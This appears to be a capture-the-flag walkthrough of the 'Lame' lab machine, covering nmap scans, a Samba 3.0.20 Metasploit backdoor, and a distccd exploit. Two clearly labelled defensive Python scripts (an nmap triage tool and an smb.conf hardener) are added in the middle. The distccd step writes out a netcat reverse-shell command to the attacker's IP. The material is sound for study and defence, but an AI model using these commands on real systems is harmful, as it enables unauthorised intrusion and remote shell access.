LAME
Lame is an easy-rated Linux machine. The target IP is 10.129.213.71, so let's start.
First, let's look at the open ports, as always.
nmap -sC -sV -O -oA nmap.txt 10.129.213.71
• Port 21: running FTP and allowing anonymous login.
• Port 22: running SSH.
• Ports 139 and 445: running Samba v3.0.20-Debian.
Let's run a full-port scan to make sure we haven't missed anything.
nmap -sC -sV -O -p- -oA nmap.txt 10.129.213.71
There is one more port, 3632, running the distccd service. I note it; we will use it later. Now let's try the FTP anonymous login, but nothing significant comes up.
We look for a backdoor related to the FTP version, and there is something.
I set RHOSTS, but no session was created; it asks for a password.
Let's see if anything comes up for port 22. There is a command execution module, but I will try this later.
For now let's move on to port 139, which runs Samba v3.0.20-Debian. There is a command execution backdoor module in Metasploit named 'Username map script'; let's try it.
We set RHOSTS to the target machine 10.129.213.71 and LHOST to tun0. This brings us a shell.
We search for the user and root flags by browsing the directories and get both.
I want to try to get a shell another way. Recall the full-port nmap result: port 3632 is open.
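The two scans above are the whole recon phase, and everything exploited later (anonymous FTP, Samba 3.0.20, distccd on 3632) is already visible in them. Added example, not part of the original writeup: a small triage script that reads the XML that `nmap -oA` also writes (the `.xml` file) and flags exactly those three exposures with a mitigation for each, so the same scan a pentester uses becomes a defender's finding list. The embedded scan document is constructed by hand to match the ports listed in the writeup; the FTP and SSH product/version strings in it are placeholders, since the page only names Samba's version.

```python
"""Flag the legacy services seen on Lame in an nmap -oX / -oA XML file.

Added example (not from the writeup). SAMPLE_NMAP_XML is a constructed
stand-in for the real nmap.txt.xml; only the Samba version comes from the page.
"""
import sys
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """\
<nmaprun scanner="nmap" args="nmap -sC -sV -p- 10.129.213.71">
  <host>
    <status state="up"/>
    <address addr="10.129.213.71" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open"/>
        <service name="ftp" product="placeholder-ftpd" version="0.0"/>
        <script id="ftp-anon" output="Anonymous FTP login allowed (FTP code 230)"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="placeholder"/>
      </port>
      <port protocol="tcp" portid="139">
        <state state="open"/>
        <service name="netbios-ssn" product="Samba smbd" version="3.0.20-Debian"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="netbios-ssn" product="Samba smbd" version="3.0.20-Debian"/>
      </port>
      <port protocol="tcp" portid="3632">
        <state state="open"/>
        <service name="distccd" product="distccd" version="v1"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def triage(nmap_xml):
    """Return a list of finding dicts (host, port, severity, issue, fix) for one nmap XML document."""
    root = ET.fromstring(nmap_xml)
    findings = []
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # only open ports are exposures
            portid = int(port.get("portid"))
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            product = svc.get("product", "") if svc is not None else ""
            version = svc.get("version", "") if svc is not None else ""
            # NSE script results (e.g. ftp-anon from -sC) live in <script> children of <port>
            scripts = {s.get("id"): s.get("output", "") for s in port.findall("script")}

            if "Anonymous FTP login allowed" in scripts.get("ftp-anon", ""):
                findings.append(dict(host=addr, port=portid, severity="medium",
                                     issue="anonymous FTP login enabled",
                                     fix="disable anonymous login in the FTP server config, or remove FTP from the network edge"))
            if "Samba" in product and version.startswith("3.0.20"):
                findings.append(dict(host=addr, port=portid, severity="high",
                                     issue=f"Samba {version}: exploitable via the 'username map script' option (Metasploit module used in the writeup)",
                                     fix="upgrade Samba and remove 'username map script' from smb.conf"))
            if name == "distccd" or portid == 3632:
                findings.append(dict(host=addr, port=portid, severity="high",
                                     issue="distccd reachable from the network (nmap distcc-cve2004-2687 script applies)",
                                     fix="firewall port 3632 and start distccd with --allow limited to build hosts"))
    return findings


def main(path=None):
    xml_text = open(path).read() if path else SAMPLE_NMAP_XML
    for f in triage(xml_text):
        print(f"[{f['severity']:6}] {f['host']}:{f['port']:<5} {f['issue']}\n         fix: {f['fix']}")


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else None)
```

Run it as `python triage.py nmap.txt.xml` against a real `-oA` output; without an argument it runs on the constructed sample and lists ports 21, 139, 445 and 3632 while leaving SSH alone.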
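The module name 'Username map script' is the fix in disguise: on Samba 3.0.20 the `username map script` smb.conf option hands untrusted usernames to a shell, so a box with that option set and that version is what the module lands on. Added example, not from the writeup: a small audit that parses an smb.conf, reports the risky global option, and writes a hardened copy with that line commented out (upgrading Samba is the other half of the fix and is not something a config edit can do). The smb.conf fragment and the script path inside it are constructed for the example.

```python
"""Audit an smb.conf for the 'username map script' option and produce a hardened copy.

Added example, not part of the writeup. SAMPLE_SMB_CONF is a constructed fragment
resembling a vulnerable legacy configuration; the map script path is a placeholder.
"""
import re
import sys

SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, constructed sample)
   username map script = /etc/samba/scripts/mapusers.sh
   security = user

[tmp]
   path = /tmp
   writable = yes
"""

# Global options the audit flags, with the reason (only the one the writeup's module relies on).
RISKY_GLOBAL_OPTIONS = {
    "username map script": "on Samba 3.0.20 the script receives attacker-chosen usernames via a shell",
}

SECTION_RE = re.compile(r"\[(.+)\]$")


def _normalise_key(key):
    """smb.conf keys are case-insensitive and whitespace-insensitive."""
    return " ".join(key.lower().split())


def parse_smb_conf(text):
    """Return {section: {option: value}} for an smb.conf-style file; comments (# or ;) are skipped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][_normalise_key(key)] = value.strip()
    return sections


def audit_smb_conf(text):
    """Return (option, value, reason) for every risky option set in [global]."""
    glob = parse_smb_conf(text).get("global", {})
    return [(opt, glob[opt], why) for opt, why in RISKY_GLOBAL_OPTIONS.items() if opt in glob]


def harden_smb_conf(text):
    """Comment out risky [global] options and leave every other line untouched."""
    out, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1).strip().lower()
        key = _normalise_key(line.partition("=")[0]) if "=" in line else None
        is_comment = line[:1] in ("#", ";")
        if current == "global" and key in RISKY_GLOBAL_OPTIONS and not is_comment:
            out.append("# removed by audit: " + line)
        else:
            out.append(raw)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    conf = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SMB_CONF
    for opt, value, why in audit_smb_conf(conf):
        print(f"[global] {opt} = {value}\n    risk: {why}")
    sys.stdout.write("\n--- hardened copy ---\n" + harden_smb_conf(conf))
```

Point it at a real file with `python smb_audit.py /etc/samba/smb.conf`; the hardened copy is printed rather than written back so an admin can diff it before replacing the live config. Re-running the audit on the hardened output returns no findings.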
Googling:
As we can see, there is an nmap script related to the distccd service; let's try it.
I tried with Meterpreter but no session was created.
Let's try with nmap. I tried 5–6 times but it didn't work; later I realized I had written my IP wrong, and fixed it after confirming with ifconfig. We pass a reverse shell command to the nmap script and open a netcat listener, and a shell drops.
nmap -p 3632 10.129.213.71 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.168 4466 -e /bin/bash'"
nc -nlvp 4466
We got another shell with a different method, but this time it is low-privileged. We already have the root flag, so that is enough.